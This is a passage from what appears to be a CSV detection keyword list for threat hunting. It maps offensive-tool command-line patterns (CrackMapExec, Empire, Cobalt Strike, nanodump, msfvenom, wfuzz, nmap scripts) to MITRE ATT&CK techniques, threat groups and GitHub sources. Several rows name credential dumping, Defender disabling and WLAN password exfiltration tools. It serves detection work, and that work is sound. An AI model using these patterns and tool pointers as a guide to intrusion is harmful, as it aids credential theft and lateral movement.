tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* vuze-dht-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -w wordlist/*.txt*http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -watson -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* wdb-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --wdigest disable*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --wdigest enable*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* web-hacking-toolkit *,offensive_tool_keyword,web-hacking-toolkit,A web hacking toolkit Docker image with GUI applications support.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signedsecurity/web-hacking-toolkit,1,0,N/A,N/A,2,142,29,2023-01-31T10:11:30Z,2021-10-16T15:47:52Z -* weblogic-t3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --werfault *\temp\*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*,greyware_tool_keyword,where,threat actors searched for Active Directory related DLLs in directories,T1059 - T1083 - T1018,A0002 - TA0009 - TA0040,N/A,N/A,Discovery,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* whois-domain.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* whois-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* winDefKiller *,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,0,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -* windows/csharp_exe*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* windows/shell/bind_tcp *,offensive_tool_keyword,msfvenom,Msfvenom 
is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -* Windows-Passwords.ps1*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* -winPEAS *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* winrm * -u * -p * --laps*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* winrm * -u * -p * -X whoami*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* winrm.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --wldp-bypass=*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -* --wmi *SELECT *,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* wmiexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --wmi-namespace 'root\cimv2'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* wmirun=true dllpath=*.dll* computername=*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -* -wordlist * -spawnto *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z
-* --wordlist=*.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-* -word-list-path * -file-extensions *,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,0,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z
-* -WorkingHours *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* --wpad --lm --ProxyAuth --disable-ess**,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* WriteToLsass*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,0,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z
-* wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* ws-dirs.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* ws-files.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* WSPCoerce.cs*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z
-* -X '$PSVersionTable' *,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -X '[System.Environment]::Is64BitProcess'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -X FUZZ http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* -X whoami --obfs*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* x11-access.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* xmlrpc-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* xmpp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* xmpp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* xpipe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 
- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,0,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z
-* Your payload has been delivered*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* -z burplog*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - 
TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* -z file*wordlist/*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* -z list*nonvalid-httpwatch --basic*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* -z range --zD 0-1 -u http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* -z range*0-10 --hl 97 http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*!autoruns *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!files upload *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
